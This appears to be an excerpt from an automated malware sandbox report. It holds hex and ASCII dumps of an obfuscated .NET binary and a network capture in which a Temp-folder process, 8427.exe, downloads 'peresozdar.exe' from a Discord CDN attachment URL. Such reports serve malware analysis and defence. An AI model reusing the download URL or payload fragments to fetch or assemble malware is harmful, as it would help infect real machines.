2023-11-18 09:03:00 UTC	10573	IN	Data Raw: 00 00 03 00 86 18 fd 11 00 00 9e 05 17 01 00 00 00 00 03 00 c6 01 4e 06 00 00 79 06 19 01 00 00 00 00 03 00 c6 01 55 06 00 00 85 06 1f 01 00 00 00 00 03 00 c6 01 4b 06 00 00 95 06 27 01 00 00 00 00 03 00 86 18 fd 11 00 00 9e 05 29 01 00 00 00 00 03 00 c6 01 4e 06 00 00 9d 06 2b 01 00 00 00 00 03 00 c6 01 55 06 00 00 a7 06 30 01 00 00 00 00 03 00 c6 01 4b 06 00 00 73 06 37 01 00 00 00 00 03 00 86 18 fd 11 00 00 9e 05 38 01 00 00 00 00 03 00 c6 01 4e 06 00 00 b5 06 3a 01 00 00 00 00 03 00 c6 01 55 06 00 00 c4 06 43 01 00 00 00 00 03 00 c6 01 4b 06 00 00 5b 06 4e 01 00 00 00 00 03 00 86 18 fd 11 00 00 9e 05 50 01 00 00 00 00 03 00 c6 01 4e 06 00 00 d7 06 52 01 00 00 00 00 03 00 c6 01 55 06 00 00 a9 05 53 01 00 00 00 00 03 00 c6 01 4b 06 00 00 73 06 56 01 00 Data Ascii: NyUK')N+U0Ks78N:UCK[NPNRUSKsV
2023-11-18 09:03:00 UTC	10577	IN	Data Raw: 09 6c 00 fd 11 00 00 42 02 49 01 b8 14 00 00 f6 02 b9 01 fd 11 00 00 42 02 7c 00 fd 11 00 00 9e 05 89 01 99 17 00 00 e7 09 84 00 fd 11 00 00 9e 05 89 01 3b 15 00 00 21 0a 89 01 e4 16 00 00 4b 0a 8c 00 fd 11 00 00 9e 05 94 00 f4 0b 00 00 7a 0a 59 01 24 0c 00 00 84 0a b9 01 b9 17 00 00 80 04 c9 01 63 13 00 00 8b 0a d1 01 7c 17 00 00 92 0a f1 01 9c 0b 00 00 aa 02 29 00 c5 0b 00 00 b0 0a 89 01 bf 14 00 00 bb 0a 9c 00 fd 11 00 00 9e 05 89 01 b9 17 00 00 d4 0a 49 01 fd 11 00 00 e5 0a 11 00 fd 11 00 00 42 02 b9 01 fd 11 00 00 b3 03 f9 01 42 15 00 00 0f 02 f9 01 37 14 00 00 0f 02 89 01 b8 14 00 00 f8 0a a4 00 fd 11 00 00 42 02 6c 00 b8 11 00 00 20 0b ac 00 53 16 00 00 13 02 b4 00 fd 11 00 00 9e 05 a4 00 ff 04 00 00 9a 09 ac 00 1d 17 00 00 5a 05 74 00 ff 04 00 00 Data Ascii: lBIB\|;!KzY$c\|)IBB7Bl SZt
2023-11-18 09:03:00 UTC	10578	IN	Data Raw: 00 00 9e 05 34 01 fd 11 00 00 9e 05 3c 01 fd 11 00 00 9e 05 89 01 32 18 00 00 e4 0f 44 01 fd 11 00 00 9e 05 4c 01 fd 11 00 00 9e 05 29 00 c5 0b 00 00 95 10 89 01 08 10 00 00 9d 10 89 01 46 06 00 00 9d 10 54 01 fd 11 00 00 9e 05 cc 00 4e 06 00 00 c9 09 64 00 4e 06 00 00 c9 09 91 02 6f 18 00 00 f9 10 01 03 3d 11 00 00 ff 10 09 03 fd 11 00 00 ec 04 99 00 c2 06 00 00 06 11 01 03 0a 11 00 00 0e 11 49 01 1e 14 00 00 17 11 b1 01 bc 0b 00 00 2e 02 21 03 2e 05 00 00 27 11 64 01 fd 11 00 00 42 02 64 01 fd 11 00 00 ec 04 b1 00 d9 04 00 00 97 03 64 01 ff 04 00 00 9a 09 49 01 cc 14 00 00 53 11 6c 01 4e 06 00 00 13 02 41 03 22 18 00 00 71 11 41 03 40 13 00 00 79 11 74 01 05 00 00 00 db 01 74 01 b4 03 00 00 d2 01 74 01 cb d2 00 00 38 06 7c 01 fd 11 00 00 9e 05 74 01 2d Data Ascii: 4<2DL)FTNdNo=I.!.'dBddISlNA"qA@yttt8\|t-
2023-11-18 09:03:00 UTC	10582	IN	Data Raw: 0b 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 60 07 00 00 00 00 00 00 00 00 2e 00 05 00 2f 00 05 00 30 00 05 00 31 00 07 00 32 00 07 00 33 00 08 00 34 00 0a 00 35 00 0a 00 36 00 0b 00 37 00 0b 00 38 00 0b 00 39 00 0c 00 3a 00 0c 00 3b 00 0c 00 3c 00 0c 00 3d 00 0e 00 3e 00 0e 00 3f 00 0e 00 40 00 0e 00 41 00 0f 00 42 00 10 00 43 00 10 00 44 00 11 00 45 00 11 00 46 00 12 00 47 00 12 00 48 00 12 00 49 00 16 00 4a 00 16 00 4b 00 16 00 4c 00 16 00 4d 00 16 00 4e 00 1a 00 4f 00 1a 00 50 00 1a 00 51 00 1c 00 52 00 1d 00 53 00 1d 00 54 00 1d 00 55 00 1d 00 56 00 1e 00 57 00 1e 00 58 00 1f 00 59 00 1f 00 5a 00 1f 00 5b 00 1f 00 5c 00 1f 00 5d 00 1f 00 5e 00 1f 00 5f 00 1f 00 60 00 20 00 61 00 20 00 62 00 20 00 63 00 21 00 64 00 26 00 65 00 Data Ascii: `./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_` a b c!d&e
2023-11-18 09:03:00 UTC	10586	IN	Data Raw: 72 65 73 73 69 6f 6e 00 53 79 73 74 65 6d 2e 4e 65 74 2e 4e 65 74 77 6f 72 6b 49 6e 66 6f 72 6d 61 74 69 6f 6e 00 70 73 7a 49 6d 70 6c 65 6d 65 6e 74 61 74 69 6f 6e 00 53 79 73 74 65 6d 2e 47 6c 6f 62 61 6c 69 7a 61 74 69 6f 6e 00 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 00 49 6e 70 75 74 4c 61 6e 67 75 61 67 65 43 6f 6c 6c 65 63 74 69 6f 6e 00 4d 61 74 63 68 43 6f 6c 6c 65 63 74 69 6f 6e 00 4d 61 6e 61 67 65 6d 65 6e 74 4f 62 6a 65 63 74 43 6f 6c 6c 65 63 74 69 6f 6e 00 67 65 74 5f 50 6f 73 69 74 69 6f 6e 00 73 65 74 5f 50 6f 73 69 74 69 6f 6e 00 57 69 6e 33 32 45 78 63 65 70 74 69 6f 6e 00 4e 6f 74 53 75 70 70 6f 72 74 65 64 45 78 63 65 70 74 69 6f 6e 00 44 69 72 65 63 74 6f 72 79 4e 6f 74 46 6f 75 6e 64 45 78 63 65 70 74 69 6f 6e 00 50 61 74 Data Ascii: ressionSystem.Net.NetworkInformationpszImplementationSystem.GlobalizationSystem.ReflectionInputLanguageCollectionMatchCollectionManagementObjectCollectionget_Positionset_PositionWin32ExceptionNotSupportedExceptionDirectoryNotFoundExceptionPat
2023-11-18 09:03:00 UTC	10590	IN	Data Raw: 81 ae e2 81 ab e2 80 8d e2 80 ab e2 80 ac e2 81 ae e2 81 ab e2 80 ac e2 80 8f e2 80 8c e2 80 8c e2 81 ab e2 81 af e2 81 af e2 80 ab e2 81 ac e2 80 ad e2 80 ac e2 81 ae e2 80 8f e2 80 8c e2 80 ae 00 e2 81 ab e2 81 ad e2 81 ab e2 81 ab e2 80 8d e2 80 8f e2 81 aa e2 81 aa e2 81 aa e2 80 ae e2 81 ac e2 80 ae e2 80 8d e2 80 8e e2 80 8b e2 81 ab e2 80 ac e2 81 ae e2 81 ab e2 80 ac e2 81 af e2 80 8d e2 80 8c e2 80 8e e2 81 af e2 80 8c e2 80 ae e2 81 ac e2 80 8e e2 81 ae e2 80 ae e2 81 aa e2 81 ac e2 80 ac e2 80 ad e2 80 8f e2 81 ad e2 81 ad e2 80 aa e2 80 8c e2 80 ae 00 e2 81 af e2 81 ac e2 80 8d e2 80 ac e2 81 af e2 80 aa e2 81 ae e2 80 8c e2 80 ad e2 80 8c e2 81 ac e2 81 af e2 81 af e2 81 ac e2 80 ac e2 81 ac e2 80 ae e2 80 ac e2 81 ac e2 80 ad e2 80 8e e2 80 Data Ascii:
2023-11-18 09:03:00 UTC	10594	IN	Data Raw: ad e2 80 ab e2 80 ad e2 80 8f e2 80 ad e2 81 ab e2 81 ad e2 80 8d e2 80 8f e2 80 8e e2 81 ab e2 80 8e e2 81 ad e2 80 8d e2 80 ae 00 e2 80 8c e2 80 8e e2 80 8b e2 80 8e e2 80 8b e2 81 ac e2 81 ab e2 81 af e2 80 ac e2 80 ab e2 80 ac e2 81 ad e2 80 8c e2 80 8c e2 80 8c e2 80 ab e2 80 8c e2 80 ac e2 80 8f e2 80 ab e2 81 af e2 80 8e e2 81 ab e2 81 ab e2 80 ac e2 80 8f e2 80 8e e2 81 ac e2 80 8d e2 80 aa e2 80 ac e2 80 aa e2 80 ad e2 80 8e e2 80 aa e2 81 ad e2 80 ad e2 80 8f e2 81 ad e2 80 8d e2 80 ae 00 e2 80 ac e2 80 ac e2 81 ab e2 81 af e2 80 8e e2 81 af e2 80 8f e2 80 ab e2 80 8f e2 81 ad e2 81 ad e2 80 ac e2 81 aa e2 80 8f e2 80 8e e2 80 8e e2 80 8e e2 80 8e e2 81 af e2 80 ac e2 80 8b e2 81 ac e2 81 ab e2 80 ac e2 80 8b e2 81 ad e2 80 8c e2 80 ac e2 81 ab Data Ascii:
2023-11-18 09:03:00 UTC	10598	IN	Data Raw: e2 81 aa e2 80 ab e2 81 ac e2 80 ab e2 80 8d e2 81 ac e2 80 8e e2 80 ae 00 e2 80 8c e2 80 8d e2 80 ae e2 81 ad e2 80 8d e2 80 8e e2 81 ae e2 80 8e e2 80 aa e2 80 8d e2 80 ac e2 80 8e e2 80 8f e2 80 ab e2 81 ae e2 80 ad e2 81 ac e2 80 8f e2 81 ae e2 81 af e2 81 ad e2 81 ad e2 80 8e e2 80 8c e2 80 ac e2 80 ac e2 80 8b e2 80 ab e2 80 8d e2 80 ac e2 80 8d e2 80 aa e2 80 8b e2 81 ac e2 81 ac e2 80 8b e2 81 af e2 80 8e e2 81 ac e2 80 8e e2 80 ae 00 e2 80 ac e2 80 8d e2 81 af e2 80 ac e2 81 ac e2 81 ac e2 80 ad e2 80 8d e2 80 8e e2 80 aa e2 80 8b e2 81 af e2 80 8f e2 80 8b e2 80 8c e2 80 8d e2 80 ac e2 81 af e2 81 ac e2 81 ad e2 80 8b e2 80 8b e2 80 8d e2 80 8f e2 81 ab e2 80 8c e2 81 ae e2 80 8e e2 80 8b e2 81 aa e2 80 8d e2 81 aa e2 80 ac e2 81 ae e2 80 ae e2 Data Ascii:
2023-11-18 09:03:00 UTC	10602	IN	Data Raw: e2 81 aa e2 80 ae e2 80 8c e2 81 ac e2 80 8e e2 80 aa e2 80 ae e2 80 8f e2 81 ac e2 81 ad e2 81 ab e2 80 aa e2 80 8d e2 81 ae e2 80 8b e2 80 ae e2 81 ad e2 80 8f e2 80 ae e2 81 ad e2 80 8d e2 80 ab e2 80 8c e2 80 8c e2 81 ac e2 80 ae e2 80 aa e2 80 8f e2 80 aa e2 80 ae e2 80 8d e2 80 8b e2 80 8b e2 81 ab e2 81 af e2 81 ab e2 81 ae e2 80 ac e2 81 ab e2 80 8f e2 80 ae 00 e2 81 af e2 81 ad e2 80 aa e2 80 8d e2 81 ab e2 81 ac e2 80 8d e2 80 8e e2 80 ae e2 80 8e e2 81 ac e2 80 8f e2 81 ab e2 80 8f e2 81 ae e2 80 ab e2 80 ad e2 81 ab e2 80 ad e2 80 ad e2 81 ae e2 81 af e2 80 ae e2 80 8d e2 80 ad e2 80 8c e2 80 8e e2 81 ae e2 80 8c e2 80 ab e2 80 8c e2 80 8c e2 81 ae e2 81 ae e2 80 ac e2 81 af e2 80 8e e2 80 ad e2 81 ab e2 80 8f e2 80 ae 00 e2 81 ab e2 81 ab e2 Data Ascii:
2023-11-18 09:03:00 UTC	10607	IN	Data Raw: 81 ab e2 80 8b e2 80 ad e2 80 8e e2 80 ae e2 81 ad e2 81 ac e2 81 ab e2 80 8c e2 80 aa e2 80 aa e2 80 8d e2 80 8c e2 80 ae e2 80 ae e2 80 aa e2 80 ae e2 81 ad e2 81 ad e2 81 af e2 80 ad e2 81 ab e2 80 8d e2 81 ab e2 80 ac e2 80 ad e2 81 ad e2 81 ae e2 80 8d e2 81 af e2 80 8f e2 81 ac e2 81 aa e2 80 ab e2 80 aa e2 80 ae 00 e2 81 ab e2 80 8d e2 81 ae e2 80 8e e2 81 ac e2 80 8d e2 80 8e e2 80 8b e2 80 8c e2 81 ae e2 80 8f e2 80 ac e2 81 af e2 80 ab e2 80 ad e2 80 8e e2 80 ab e2 80 ae e2 80 ab e2 80 8d e2 80 8c e2 81 ac e2 80 aa e2 80 ac e2 80 8d e2 81 ad e2 81 ac e2 81 ae e2 80 ae e2 81 aa e2 80 8b e2 80 ac e2 81 ad e2 81 aa e2 81 ad e2 80 ac e2 81 ae e2 80 ab e2 80 aa e2 80 ae 00 e2 80 ac e2 80 8e e2 80 8d e2 80 ab e2 81 ae e2 81 ae e2 81 aa e2 80 8d e2 81 Data Ascii:
2023-11-18 09:03:00 UTC	10610	IN	Data Raw: e2 81 ad e2 80 aa e2 80 8e e2 80 ae e2 80 8e e2 81 aa e2 80 ae 00 e2 80 ae e2 81 ac e2 80 aa e2 81 af e2 81 ab e2 80 ae e2 81 ae e2 80 ad e2 80 8f e2 81 ac e2 81 ae e2 80 aa e2 80 aa e2 81 ae e2 80 aa e2 80 8b e2 80 aa e2 80 ae e2 80 8c e2 81 ab e2 80 ad e2 81 ae e2 80 aa e2 80 ad e2 80 ac e2 80 8d e2 80 ab e2 81 af e2 81 ad e2 80 8c e2 80 aa e2 80 8d e2 80 8d e2 80 aa e2 81 ab e2 80 8f e2 80 ad e2 80 ae e2 80 8f e2 81 aa e2 80 ae 00 e2 81 af e2 80 ae e2 80 ad e2 80 8e e2 80 ae e2 80 8b e2 80 ab e2 81 af e2 81 af e2 80 ae e2 81 ac e2 81 ad e2 81 aa e2 81 aa e2 80 ab e2 80 8e e2 81 ac e2 81 af e2 81 ae e2 80 8d e2 81 af e2 81 ae e2 80 ab e2 80 aa e2 81 ae e2 80 aa e2 81 ae e2 81 ae e2 81 af e2 80 aa e2 80 ad e2 80 ab e2 80 ae e2 80 ad e2 80 ae e2 81 ad e2 Data Ascii:
2023-11-18 09:03:00 UTC	10614	IN	Data Raw: 80 8f e2 80 ab e2 80 ae 00 e2 80 ab e2 80 aa e2 81 ab e2 80 8d e2 80 aa e2 81 ae e2 80 8d e2 80 ad e2 80 ad e2 80 8e e2 80 8d e2 80 8f e2 80 aa e2 81 ad e2 80 ae e2 80 aa e2 80 ab e2 80 8e e2 81 aa e2 80 ad e2 80 ae e2 81 aa e2 80 8f e2 80 8e e2 80 ae e2 81 ab e2 80 ad e2 80 8c e2 81 ad e2 81 af e2 80 ab e2 81 ab e2 80 8e e2 80 8c e2 81 af e2 81 ac e2 80 8c e2 80 8b e2 81 aa e2 80 ab e2 80 ae 00 e2 80 aa e2 81 ad e2 81 ae e2 80 8c e2 80 8e e2 80 8d e2 80 8f e2 80 ab e2 80 8d e2 81 ac e2 81 ad e2 80 8c e2 81 ab e2 80 ad e2 80 ac e2 81 ab e2 81 ad e2 80 8f e2 80 ab e2 81 af e2 81 ad e2 80 8d e2 80 ac e2 80 8c e2 80 ac e2 80 8d e2 80 8d e2 80 8b e2 81 aa e2 81 aa e2 80 8d e2 80 ae e2 81 ae e2 81 aa e2 81 ad e2 80 ab e2 81 ae e2 80 ad e2 80 ab e2 80 ab e2 80 Data Ascii:
2023-11-18 09:03:00 UTC	10618	IN	Data Raw: 80 ab e2 81 ab e2 81 aa e2 80 8d e2 81 af e2 80 8d e2 80 ae e2 81 aa e2 80 8e e2 80 8b e2 81 ae e2 80 8c e2 80 8e e2 80 ac e2 80 ad e2 81 af e2 80 ad e2 80 8c e2 80 8f e2 80 ad e2 80 8b e2 81 ac e2 80 8b e2 80 aa e2 80 8d e2 80 ae e2 80 8f e2 80 aa e2 80 ad e2 80 ab e2 81 ac e2 80 ab e2 80 ab e2 80 8b e2 80 ae e2 80 8e e2 81 ab e2 80 ae 00 e2 80 8e e2 81 aa e2 81 af e2 80 8e e2 80 ad e2 80 8f e2 81 ae e2 80 8d e2 80 ac e2 80 8b e2 81 ac e2 81 af e2 80 8c e2 81 ac e2 80 ad e2 80 ac e2 80 8b e2 80 ae e2 80 ad e2 81 ab e2 80 8b e2 80 ab e2 81 ab e2 81 ab e2 80 ac e2 80 8c e2 81 aa e2 81 ac e2 80 ae e2 80 8f e2 81 ab e2 80 ab e2 81 aa e2 81 af e2 80 8e e2 80 8f e2 81 aa e2 81 ac e2 80 8f e2 81 ab e2 80 ae 00 e2 81 ac e2 80 8b e2 81 aa e2 80 8f e2 80 ae e2 80 Data Ascii:
2023-11-18 09:03:00 UTC	10622	IN	Data Raw: ad e2 80 8b e2 80 ac e2 80 ab e2 80 aa e2 80 aa e2 80 ac e2 81 ab e2 80 ad e2 81 aa e2 80 8e e2 80 8e e2 80 8d e2 81 af e2 80 ab e2 81 aa e2 80 8f e2 80 ad e2 80 aa e2 80 ab e2 80 8c e2 80 8e e2 80 ac e2 81 ae e2 81 ae e2 81 ab e2 80 8c e2 80 8c e2 80 ac e2 81 aa e2 80 ac e2 80 ae 00 e2 81 aa e2 80 8f e2 81 aa e2 80 8b e2 80 ae e2 80 8d e2 80 8f e2 81 ae e2 80 ab e2 80 ae e2 80 8b e2 81 ae e2 81 ae e2 80 ae e2 80 8d e2 81 ab e2 80 ac e2 80 ae e2 80 ad e2 80 ae e2 80 8b e2 80 ab e2 81 ab e2 81 ae e2 80 ad e2 81 ad e2 81 ab e2 80 ae e2 80 8b e2 80 8d e2 80 8f e2 80 ae e2 80 8c e2 80 aa e2 81 ab e2 80 8c e2 81 ac e2 81 ac e2 81 aa e2 80 ac e2 80 ae 00 e2 80 ad e2 80 ad e2 80 ab e2 80 ae e2 80 ac e2 81 af e2 80 ac e2 80 8d e2 80 ad e2 80 8c e2 81 af e2 81 ae Data Ascii:
2023-11-18 09:03:00 UTC	10626	IN	Data Raw: e2 80 8b e2 81 af e2 80 ab e2 80 ac e2 80 ad e2 81 af e2 80 8b e2 81 ad e2 81 ab e2 81 ac e2 81 aa e2 80 aa e2 81 af e2 80 8b e2 80 8e e2 80 aa e2 81 ab e2 80 ac e2 80 8f e2 81 ae e2 81 aa e2 81 ae e2 80 8c e2 81 ac e2 80 ae 00 e2 80 ab e2 80 ab e2 80 8c e2 81 ad e2 81 ae e2 81 ad e2 81 af e2 81 ae e2 80 ab e2 80 ac e2 80 ab e2 80 8c e2 81 ae e2 81 ad e2 81 aa e2 80 ae e2 80 ae e2 81 ae e2 81 aa e2 80 aa e2 80 ac e2 80 ac e2 81 ad e2 80 aa e2 80 ae e2 81 aa e2 81 ad e2 81 ad e2 81 ad e2 81 ad e2 80 8d e2 80 ac e2 80 8f e2 80 8b e2 81 af e2 80 ac e2 80 8c e2 80 8d e2 80 8d e2 81 ac e2 80 ae 00 e2 80 aa e2 80 aa e2 81 ab e2 81 ab e2 81 ac e2 81 ab e2 80 8d e2 80 ad e2 81 ab e2 80 8b e2 81 af e2 80 ae e2 80 8b e2 81 af e2 81 ab e2 80 ae e2 80 8d e2 81 ab e2 Data Ascii:
2023-11-18 09:03:00 UTC	10630	IN	Data Raw: 80 aa e2 81 af e2 80 ae e2 80 ac e2 80 ad e2 80 8e e2 80 8c e2 81 af e2 80 8f e2 80 aa e2 81 aa e2 80 8b e2 80 ab e2 80 8e e2 80 8d e2 80 aa e2 80 8e e2 80 ad e2 80 ae 00 e2 81 ae e2 80 aa e2 80 8c e2 80 8b e2 80 ab e2 81 ad e2 80 8e e2 81 ac e2 81 aa e2 80 8e e2 80 ad e2 80 8d e2 80 ad e2 81 ad e2 81 ab e2 80 8d e2 80 8b e2 80 ad e2 81 ad e2 80 ab e2 80 8c e2 80 ac e2 81 aa e2 80 ab e2 81 ae e2 80 ac e2 80 ab e2 81 ab e2 81 ac e2 80 ab e2 80 8d e2 80 8c e2 81 ac e2 80 aa e2 80 ab e2 80 ab e2 80 8b e2 80 8c e2 80 8f e2 80 ad e2 80 ae 00 e2 81 ae e2 80 8d e2 80 ab e2 81 ae e2 80 ac e2 80 ac e2 80 ad e2 80 8d e2 80 ae e2 81 aa e2 81 aa e2 80 8f e2 80 ac e2 81 ae e2 80 ad e2 80 8b e2 80 8c e2 81 aa e2 80 ae e2 81 ae e2 81 aa e2 81 af e2 81 ab e2 80 ac e2 81 Data Ascii:
2023-11-18 09:03:00 UTC	10635	IN	Data Raw: 8e e2 80 8e e2 80 ad e2 80 8b e2 80 8d e2 80 8d e2 81 ad e2 80 8e e2 80 ac e2 80 ab e2 81 ad e2 80 ae 00 e2 80 ac e2 80 8b e2 80 ae e2 81 ae e2 81 af e2 80 8b e2 80 8b e2 81 ac e2 80 ac e2 80 aa e2 80 8b e2 81 af e2 80 ad e2 80 8c e2 80 ae e2 81 ad e2 80 8d e2 80 8b e2 80 ad e2 80 aa e2 80 aa e2 80 8f e2 80 ab e2 80 ad e2 81 ad e2 81 af e2 80 8f e2 80 aa e2 81 ac e2 80 8e e2 80 8e e2 80 8b e2 80 ac e2 80 ac e2 81 ab e2 80 8b e2 80 8b e2 81 ae e2 80 ab e2 81 ad e2 80 ae 00 e2 80 ab e2 81 ab e2 80 ad e2 80 ab e2 80 8d e2 81 ad e2 80 8c e2 81 ae e2 80 8f e2 81 ad e2 80 8b e2 80 ab e2 81 ae e2 81 ad e2 80 ae e2 80 8b e2 80 8c e2 80 8d e2 81 ac e2 80 8b e2 80 8d e2 81 af e2 81 af e2 80 ac e2 80 ac e2 81 ac e2 80 8f e2 80 8b e2 81 ae e2 81 ab e2 80 ab e2 80 ab Data Ascii:
2023-11-18 09:03:00 UTC	10639	IN	Data Raw: e2 81 aa e2 80 ac e2 80 ab e2 80 ae e2 80 ae 00 e2 81 ad e2 81 ae e2 81 ad e2 80 8f e2 80 8e e2 80 ab e2 80 ac e2 81 ae e2 80 8c e2 80 ae e2 81 ab e2 80 ad e2 81 af e2 80 8b e2 81 ac e2 80 8e e2 81 aa e2 80 8b e2 80 ab e2 81 aa e2 80 8d e2 81 aa e2 80 8e e2 81 ab e2 81 af e2 80 ac e2 81 af e2 80 8b e2 80 ae e2 81 aa e2 81 aa e2 81 ae e2 80 ad e2 80 ac e2 80 ad e2 81 af e2 81 ae e2 80 8b e2 81 ab e2 80 ae e2 80 ae 00 e2 81 ae e2 80 ac e2 80 8c e2 81 aa e2 81 ab e2 80 8b e2 80 ab e2 80 ab e2 80 ab e2 80 8c e2 81 aa e2 81 af e2 81 ae e2 81 af e2 81 aa e2 81 af e2 80 8c e2 80 8d e2 80 ab e2 80 ab e2 80 ad e2 81 af e2 80 8c e2 81 ab e2 80 ab e2 80 ad e2 80 ad e2 80 aa e2 81 af e2 80 ae e2 80 ac e2 81 aa e2 80 8e e2 80 8f e2 80 8b e2 80 ab e2 80 aa e2 80 ab e2 Data Ascii:
2023-11-18 09:03:00 UTC	10642	IN	Data Raw: 80 8f e2 80 aa e2 81 ac e2 81 ac e2 81 aa e2 80 8b e2 80 8e e2 81 ab e2 80 ab e2 80 ad e2 80 ae e2 81 ae e2 80 ae e2 81 ab e2 80 8d e2 80 8b e2 81 aa e2 80 ab e2 81 ae e2 80 aa e2 81 aa e2 80 8d e2 81 ae e2 80 ae 00 e2 80 8c e2 80 ab e2 80 8e e2 80 ae e2 81 aa e2 81 ac e2 80 8f e2 80 8c e2 80 aa e2 81 ae e2 80 ad e2 80 ac e2 81 ac e2 80 8e e2 81 ae e2 81 ad e2 80 8c e2 81 ae e2 80 ad e2 80 ac e2 81 af e2 81 ab e2 80 ac e2 80 8e e2 81 ab e2 81 aa e2 80 ab e2 81 aa e2 81 ab e2 80 ad e2 81 ad e2 81 ab e2 80 ac e2 80 ae e2 81 ad e2 81 ab e2 80 8e e2 80 8b e2 80 8e e2 81 ae e2 80 ae 00 e2 80 ae e2 80 8e e2 81 ab e2 80 8d e2 80 aa e2 80 ae e2 81 af e2 80 8c e2 81 ac e2 80 ae e2 80 ab e2 80 ab e2 80 8d e2 81 af e2 80 ad e2 80 ac e2 81 ac e2 80 8d e2 81 ac e2 81 Data Ascii:
2023-11-18 09:03:00 UTC	10646	IN	Data Raw: 8f e2 80 aa e2 80 8b e2 80 aa e2 80 ab e2 80 8c e2 80 aa e2 80 8f e2 81 ab e2 80 ae e2 80 8d e2 80 8c e2 81 ac e2 80 aa e2 81 ae e2 81 ae e2 80 8c e2 81 ae e2 81 ae e2 80 ae 00 e2 80 ab e2 80 8d e2 80 ab e2 80 aa e2 81 aa e2 80 aa e2 80 8f e2 80 8c e2 80 8c e2 80 ae e2 80 aa e2 81 ad e2 81 af e2 80 aa e2 80 8b e2 81 aa e2 81 ac e2 80 ae e2 80 ad e2 80 8f e2 80 ac e2 80 ae e2 80 8c e2 81 ae e2 80 8f e2 80 8c e2 80 8d e2 80 ae e2 81 ab e2 80 8b e2 81 aa e2 80 ab e2 81 ae e2 80 8f e2 81 ad e2 80 ab e2 80 ae e2 80 8d e2 81 af e2 81 ae e2 80 ae 00 e2 80 ac e2 81 ad e2 80 ac e2 81 ad e2 81 aa e2 81 ae e2 81 ad e2 81 aa e2 80 8d e2 80 ab e2 80 ad e2 80 aa e2 81 ac e2 80 8b e2 80 ac e2 80 ae e2 81 ab e2 80 ad e2 80 8e e2 80 ab e2 80 8b e2 80 ae e2 80 8d e2 81 ab Data Ascii:
2023-11-18 09:03:00 UTC	10650	IN	Data Raw: e2 81 af e2 80 aa e2 80 ac e2 80 ac e2 81 ad e2 81 ab e2 80 8d e2 81 ad e2 80 ad e2 80 8d e2 80 aa e2 81 af e2 81 af e2 80 ae 00 e2 80 8c e2 81 ab e2 81 ac e2 80 ac e2 81 af e2 81 af e2 81 aa e2 80 ab e2 80 ad e2 80 aa e2 80 8d e2 80 8b e2 81 af e2 80 8f e2 80 ac e2 80 ab e2 80 8e e2 80 ae e2 80 8e e2 80 ab e2 80 8e e2 80 8d e2 80 ab e2 81 ad e2 80 8c e2 80 8f e2 80 8d e2 80 ac e2 80 8b e2 80 8c e2 80 ad e2 81 ae e2 81 ac e2 80 aa e2 81 af e2 81 ae e2 80 aa e2 81 aa e2 81 af e2 81 af e2 80 ae 00 e2 80 8f e2 80 aa e2 81 ab e2 81 aa e2 80 ab e2 80 8b e2 80 8c e2 81 aa e2 80 ad e2 80 ab e2 80 ac e2 80 8e e2 81 ab e2 80 8d e2 81 ac e2 80 8d e2 80 ab e2 80 ad e2 80 ae e2 80 aa e2 81 ad e2 80 8d e2 80 8d e2 81 ab e2 81 ae e2 80 ac e2 81 ab e2 80 8d e2 81 ad e2 Data Ascii:
2023-11-18 09:03:00 UTC	10655	IN	Data Raw: 81 14 1d 05 06 00 03 1c 0e 0e 1c 10 07 08 11 81 18 1d 0e 08 0e 12 81 20 0e 1d 0e 08 07 07 02 12 81 1c 1d 05 08 20 02 1d 05 12 81 69 0e 08 07 03 12 64 0e 12 80 c1 04 06 12 81 6d 06 20 01 12 81 6d 0e 04 20 00 1d 0e 0b 07 06 12 81 6d 1d 0e 08 0e 0e 0e 0b 15 12 21 02 0e 15 12 08 02 0e 0e 09 0a 02 0e 15 12 08 02 0e 0e 10 15 12 21 02 15 12 08 02 0e 0e 15 12 35 01 12 41 18 15 12 45 03 15 12 08 02 0e 0e 12 41 15 12 0c 02 15 12 08 02 0e 0e 12 41 25 10 03 03 15 12 35 01 1e 02 15 12 35 01 1e 00 15 12 21 02 1e 00 15 12 35 01 1e 01 15 12 45 03 1e 00 1e 01 1e 02 16 0a 03 15 12 08 02 0e 0e 12 41 15 12 0c 02 15 12 08 02 0e 0e 12 41 21 15 12 21 02 15 12 0c 02 15 12 08 02 0e 0e 12 41 15 12 10 02 15 12 0c 02 15 12 08 02 0e 0e 12 41 0e 1f 0a 02 15 12 0c 02 15 12 08 02 0e 0e Data Ascii: idm m m!!5AEAA%55!5EAA!!AA

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
30	192.168.2.4	49789	162.159.135.233	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:59 UTC	10514	OUT	GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2023-11-18 09:03:00 UTC	10514	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:00 GMT Content-Type: application/x-msdos-program Content-Length: 145920 Connection: close CF-Ray: 827f09a91931c54d-SEA CF-Cache-Status: HIT Accept-Ranges: bytes, bytes Age: 405184 Cache-Control: public, max-age=31536000 Content-Disposition: attachment; filename="peresozdar.exe" ETag: "6c209163f8881e51e553f6c1b306d645" Expires: Sun, 17 Nov 2024 09:03:00 GMT Last-Modified: Wed, 25 Oct 2023 18:09:12 GMT Vary: Accept-Encoding Alt-Svc: h3=":443"; ma=86400 x-goog-generation: 1698257352039086 x-goog-hash: crc32c=ncQZlA== x-goog-hash: md5=bCCRY/iIHlHlU/bBswbWRQ== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 145920 X-GUploader-UploadID: ABPtcPoiAF9iyGRhzbWhDGA4S4DxkeMA5BT4td0yc4uWqAdaQyK7pMPo-On5NsfPK7R9bQGEweAFy9HQaA X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: __cf_bm=M0ulsihW9j6MNtds77J5Y4OoRj4g5rrWaS0XEX0VVNo-1700298180-0-AZCnjbbhluY3PvhGLGLCgu+yy34GZwEUdHV+dxIL9/1lt9iwnnTz8mA07U+xXTRBfhw+KckCJWriq6WsaTAzNEI=; path=/; expires=Sat, 18-Nov-23 09:33:00 GMT; domain=.discordapp.com; HttpOnly; Secure
